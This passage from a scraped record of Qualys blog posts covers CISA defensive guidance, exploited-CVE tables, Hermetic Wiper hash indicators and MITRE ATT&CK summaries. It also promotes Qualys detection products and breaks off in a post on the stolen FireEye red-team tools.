We have implemented additional security, monitoring, and governance measures involving our senior leadership and are committed to ensuring that the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) remains available and secure to support the enterprises we serve worldwide.\n\n### Urgent: Assess and Heighten Your Security Posture\n\nBased on high-level guidelines provided by CISA, Qualys recommends that all organizations take the following actionable steps to adopt a heightened cybersecurity posture and protect critical assets.\n\nThere are 4 steps necessary to strengthen security posture per CISA\u2019s Shields Up guidance: \n\n\n * Step 1: Know Your Shodan/Internet Exposed Assets Automatically\n * Step 2: Detect, Prioritize, and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n * Step 3: Protect Your Cloud Services and Office 365 Environment\n * Step 4: Continuously Detect a Potential Intrusion\n\n* * *\n\n**Implement CISA\u2019s Shields Up Guidance**\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Step 1: Monitor Your Shodan/Internet Exposed Assets \n\n\n#### Discover and protect your external-facing assets \n\n\nAn organization\u2019s internet-facing systems represent much of its potential attack surface. Cyber threat actors are continuously scanning the internet for vulnerable systems to target with attacks and campaigns. Often hackers find this information readily available on the dark web or in plain sight on internet search engines such as Shodan.io.\n\nInventory all your assets and monitor your external attack surface. [Qualys CyberSecurity Asset Management (CSAM)](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides comprehensive visibility of your external-facing IT infrastructure by natively correlating asset telemetry collected by Qualys sensors (e.g. 
Internet Scanners, Cloud Agents, Network Passive Sensors) and key built-in integrations such as [Shodan.io](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and Public Cloud Providers.\n\nOne of the biggest risks is unknown unknowns. These gaps in visibility happen for many reasons \u2013 including shadow IT, forgotten websites, legacy services, mergers & acquisitions (M&A), or simply because a development team exposes an application or database without informing their security team.\n\nCSAM enables you to continuously discover these blind spots and assess their security and compliance posture.\n\n\n\n#### Monitor Industrial Control Systems and Operational Technology\n\nNetwork segmentation traditionally kept Industrial Control Systems air-gapped. However, the acceleration of digital transformation has enabled more of these systems to connect with corporate as well as external networks, such as device vendors and Industrial IoT platforms. Further, the majority of Operational Technology utilizes legacy, non-secure protocols.\n\nBuild full visibility of your critical infrastructure, network communications, and vulnerabilities with Qualys Industrial Control Security (ICS).\n\n\n\n#### Detect and disable all non-essential ports and protocols, especially on internet exposed assets\n\nInventory your internal and external-facing assets, and report open ports and the services detected on each port. Qualys CSAM supports an extensive query language that enables teams to report and act on detected external-facing assets that have a remote-control service running (for example Windows Remote Desktop). \n\n\n\n#### Ensure all systems are protected with up-to-date antivirus/anti-malware software\n\nFlag assets within your inventory that are missing antivirus, or with signatures that are not up to date. 
CSAM allows you to define Software Rules and assign required software on a specific scope of assets or environment. For example, all database servers should have antivirus and a data loss prevention agent.\n\n\n\nVerify that your antivirus/anti-malware engine is up to date with the latest signatures.\n\n\n\nFor devices missing antivirus or anti-malware, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) with Integrated Anti-Malware can be easily enabled wherever the Qualys Cloud Agent is installed to provide immediate threat protection. In addition to basic anti-malware protection, Multi-Vector EDR will monitor endpoint activity to identify suspicious and malicious activity that usually bypasses traditional antivirus, such as Living-off-the-Land attacks, as well as MITRE ATT&CK tactics and techniques.\n\n### Step 2: Detect, Prioritize and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n\nQualys researchers analyzed all 300+ CVEs in CISA\u2019s Known Exploited Vulnerabilities catalog and mapped them to Qualys QIDs. Many of these CVEs have had patches available for several years. A new \u201cCISA Exploited\u201d RTI was added to VMDR to help customers create vulnerability reports that are focused on CISA exploited vulnerabilities. Customers can use the VMDR vulnerabilities page or VMDR prioritization page and filter the results to focus on all the \u201cCISA Exploited\u201d open vulnerabilities in their environment. 
\n\nFollowing are some of the critical vulnerabilities cataloged by CISA that are specifically known to be exploited by Russian state-sponsored APT actors for initial access:\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### Remediate CISA recommended catalog of exploited vulnerabilities \n\nFor all CISA cataloged vulnerabilities known to be exploited by Russian state-sponsored 
actors, [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) customers can create patch and configuration fix jobs to remediate the risk of all vulnerabilities directly from the VMDR console. Qualys Patch Management maps \u201cCISA Exploited\u201d vulnerabilities detected in the environment to the relevant patches required to remediate those vulnerabilities, downloading the patches without needing to go through the VPN. Customers may use Zero Touch patching to automate the process and ensure all CISA exploited vulnerabilities are automatically fixed, including new vulnerabilities added to the CISA catalog in the future. \n\n\n\n#### Monitor and ensure your software is always up to date\n\nImmediately know all end-of-support critical components across your environment, including open-source software. Qualys CSAM tracks lifecycle stages and corresponding support status, to help organizations manage their technical debt and to reduce the risk of not receiving security patches from the vendor. Security and IT teams can work together to plan upgrades ahead of time by knowing upcoming end-of-life & end-of-support dates.\n\n\n\nUse the \u201cPrioritize Report\u201d function in Qualys Patch Management to map software in your environment to the security risk posed. Prioritize your remediation efforts based on software that introduces the most risk. Use this report to create automated patch jobs to ensure that the riskiest software is always up to date. Alternatively, deploy individual patches for the riskiest software. 
\n\n\n\n### Step 3: Protect Your Cloud Services and Office 365\n\nAs noted by CISA, misconfiguration of cloud services and SaaS applications like Office 365 is the primary attack vector for breaches.\n\n#### Detect and Remediate Public Cloud Infrastructure Misconfigurations\n\nProtect your public cloud infrastructure by securing the following services as a priority:\n\n * **IAM**: Ensure all users have MFA enabled and rotate all access keys older than 30 days. Verify that all service accounts are valid (i.e. in use) and have the minimum privilege.\n * **Audit Logs**: Turn on access logging for all cloud management events and for critical services (e.g. S3, RDS, etc.)\n * **Public-facing assets**: Validate that the firewall rules for public-facing assets allow only the needed ports. Pay special attention to RDP access. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.\n\nAutomatically detect and remediate cloud misconfigurations using [Qualys CloudView](<https://www.qualys.com/apps/cloud-security-assessment/>).\n\n\n\n#### Protect your Office 365 and Other SaaS Services\n\nEnforce multi-factor authentication on all accounts with access to Office 365 tenants. At a minimum, enable MFA for all accounts holding any admin role on the tenant. [Qualys SaaSDR](<https://www.qualys.com/apps/saas-detection-response/>) lists all such accounts on which MFA is disabled. Further, Qualys SaaSDR enables continuous security posture assessment of Office 365 via the CIS (Center for Internet Security) certified policy for Office, along with automated security configuration assessment for Zoom, Salesforce, and Google Workspace. 
This is based on an analysis of all security weaknesses, critical vulnerabilities, and exploits leveraged by attackers in historical attacks, as well as security assessments based on the MITRE ATT&CK framework.\n\n\n\n### Step 4: Continuously Detect any Potential Threats and Attacks \n\nMonitor for increases in suspicious and malicious activities as well as anomalous behavior on all endpoints. Qualys Multi-Vector EDR captures process, file, and network events on the endpoint and correlates them with the latest threat intelligence, including new Indicators of Compromise (IOC) constantly added by the Qualys Research Team, so customers can detect the IOCs and MITRE ATT&CK Tactics & Techniques provided by CISA and respond quickly to mitigate the risk. Anomalous endpoint behavior is detected and identified as MITRE ATT&CK Tactics and Techniques.\n\n\n\nThe Appendix at the bottom of this post contains a list of Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques being utilized.\n\n## Take Action to Learn More about How to Strengthen Your Defenses\n\nWe encourage you to learn more about how to strengthen your defenses consistent with CISA Shields Up guidelines using Qualys Cloud Platform. Join our webinar, [How to Meet CISA Shields Up Guidelines for Cyberattack Protection](<https://event.on24.com/wcc/r/3684128/0F6FB4010D39461FD4209A3E4EB8E9CD>), on March 3, 2022.\n\nQualys recommends that all organizations, regardless of size, heighten their security posture based on the above actionable steps, to protect critical cyber infrastructure from potential state-sponsored, advanced cyberattacks. Qualys Cloud Platform remains continuously committed to high standards of security and compliance to safeguard customer data. 
In this amplified threat environment, the entire Qualys team is available to help our customers improve cybersecurity and resilience.\n\n* * *\n\n**Implement CISA\u2019s Shields Up Guidance**\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Appendix\n\n#### CISA catalog of known exploited vulnerabilities by state attackers\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-1653| 13405| Cisco Small Business RV320 and RV325 Router Multiple Security Vulnerabilities| 1/29/2019| 7.5 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-9670| 375990| Zimbra XML External Entity Injection (XXE) Vulnerability| 8/12/2021| 9.8 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021-26857 
CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### List of IOCs related to Hermetic Wiper aka KillDisk\n\n**SHA256 Hashes** \n--- \n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da \n06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 \n095c7fa99dbc1ed7a3422a52cc61044ae4a25f7f5e998cc53de623f49da5da43 \n0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0 \n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 \n2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf \n34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 \n3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 \n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 \n7e154d5be14560b8b2c16969effdb8417559758711b05615513d1c84e56be076 \n923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 \n9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d \na196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 \nb01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1 \nb60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22 \nb6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd \nc2d06ad0211c24f36978fe34d25b0018ffc0f22b0c74fd1f915c608bf2cfad15 \nd4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a \ndcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 \ne5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 \nf50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321 \nfd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d \n \n#### List of MITRE ATT&CK TIDs provided by CISA\n\n**Tactic**| **Technique**| **Procedure** \n---|---|--- \nReconnaissance 
[[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]| Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)]| Russian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]| Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)]| Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]| Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]| Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]| Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]| Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]| Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]| Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. 
They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]| Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]| Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]| Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]| Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]| Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. 
\nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]| Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]| Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]| Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]| Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-26T20:20:32", "type": "qualysblog", "title": "Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-26T20:20:32", "id": "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. 
Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. 
You can search for these QIDs in the VMDR Dashboard using the following QQL query:\n\n```\nvulnerabilities.vulnerability.cveIds: [`CVE-2021-26855`, `CVE-2021-26857`, `CVE-2021-26858`, `CVE-2021-27065`, `CVE-2021-22893`, `CVE-2021-22894`, `CVE-2021-22899`, `CVE-2021-22900`, `CVE-2021-27101`, `CVE-2021-27102`, `CVE-2021-27103`, `CVE-2021-27104`, `CVE-2021-21985`, `CVE-2018-13379`, `CVE-2020-12812`, `CVE-2019-5591`, `CVE-2019-19781`, `CVE-2019-11510`, `CVE-2018-13379`, `CVE-2020-5902`, `CVE-2020-15505`, `CVE-2017-11882`, `CVE-2019-11580`, `CVE-2019-18935`, `CVE-2019-0604`, `CVE-2020-0787`, `CVE-2020-1472`]\n```\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize these vulnerabilities using the \u201cActive Attack\u201d RTI:\n\n\n\nWith the VMDR Dashboard, you can track the top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerability trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance teams should keep a close eye on indicators of compromise (IOCs) and maintain strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * 
Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", 
"CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-22T22:56:21", "description": "#### **_Qualys Researchers found Millions of devices exposed to vulnerabilities used in the stolen FireEye Red Team tools and SolarWinds Orion by analyzing the anonymized set of vulnerabilities across Qualys\u2019 worldwide customer base_**\n\n##### **_Qualys to offer a free 60-day integrated Vulnerability Management, Detection and Response service to help organizations quickly assess the devices impacted by SolarWinds Orion vulnerabilities, SUNBURST Trojan detections, or FireEye Red Team tools, and to remediate them and track their remediation via dynamic dashboards. Register at <https://www.qualys.com/solarhack/>_**\n\nOn Dec 8, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) the theft of its Red Team assessment tools which leverage over 16 known CVEs to exploit client environments to test and validate their security posture. [FireEye also confirmed](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>) a trojanized version of SolarWinds Orion software was used to facilitate this theft.\n\nAccess to these sophisticated FireEye Red Team tools stolen by the attackers increases the risk of an attack on an organization\u2019s critical infrastructure. Red teams often use a known set of vulnerabilities to exploit and quickly compromise systems to simulate what a real attacker can do in the network. 
If these tools fall into the wrong hands, it will increase the chances of successfully exploiting the vulnerabilities.\n\n### Why is this security incident so important?\n\nTo underscore the seriousness of this breach, the Department of Homeland Security has issued an [emergency directive](<https://cyber.dhs.gov/ed/21-01/>) ordering all federal agencies to take immediate steps in mitigating the risk of SolarWinds Orion applications and other security vulnerabilities related to the stolen FireEye Red Team tools. They\u2019ve also strongly recommended that commercial organizations adhere to the same guidance.\n\n### 7+ million vulnerable instances open to potential attack across networks of global organizations analyzed by Qualys researchers\n\nThe Qualys Cloud Platform is the most widely used platform for Vulnerability Management by global organizations. Qualys Vulnerability Research Teams continuously investigate vulnerabilities being exploited by attackers. Since the public release of this information by FireEye and SolarWinds, our researchers have analyzed the state of these anonymized vulnerabilities across networks of organizations using Qualys Cloud Platform. While the number of vulnerable instances of SolarWinds Orion is in the hundreds, our analysis has identified over 7.54 million vulnerable instances related to FireEye Red Team tools across 5.29 million unique assets, highlighting the scope of the potential attack surface if these tools are misused. Organizations need to move quickly to protect themselves from exploitation of these vulnerabilities.\n\nThe good news is that patches have been available for these vulnerabilities for some time. Interestingly, further analysis of those 7.54 million vulnerable instances indicated about 7.53 million or roughly 99.84% are from only eight vulnerabilities in Microsoft\u2019s software as listed below. 
